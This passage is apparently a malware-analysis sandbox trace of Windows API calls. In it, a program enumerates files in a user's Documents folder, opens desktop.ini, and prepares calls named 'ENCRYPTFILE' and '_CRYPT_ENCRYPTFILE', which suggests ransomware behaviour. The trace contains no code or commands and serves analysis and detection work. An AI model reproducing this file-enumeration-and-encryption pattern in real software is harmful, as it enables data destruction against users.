ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca730, cFileName="..", cAlternateFileName="")) returned 1 [0083.610] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x43ca730, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="_private", cAlternateFileName="")) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2350, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2350, ftLastWriteTime.dwLowDateTime=0x43e95f0, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="視мńဓ+\x10")) returned 0 [0083.611] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0083.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|desktop.ini|Favorites.vssx", cchCount1=27, lpString2="", cchCount2=0) returned 3 [0083.611] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0083.611] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac140 [0083.611] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0083.611] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0083.611] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0083.612] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0083.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0083.612] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0083.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0083.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0083.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0083.613] FreeLibrary (hLibModule=0x772d0000) returned 1 [0083.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0083.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0083.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0083.613] CloseHandle (hObject=0x298) returned 1 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0083.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0083.614] FreeLibrary (hLibModule=0x772d0000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0083.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0083.615] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0083.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0083.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0083.616] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0083.616] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0083.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0083.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0083.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d938 [0083.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0083.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0083.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0083.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0083.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0083.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0083.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0083.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0083.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0083.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0083.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0083.619] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0083.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0083.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0083.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0083.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0083.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0083.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0083.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0083.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0083.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 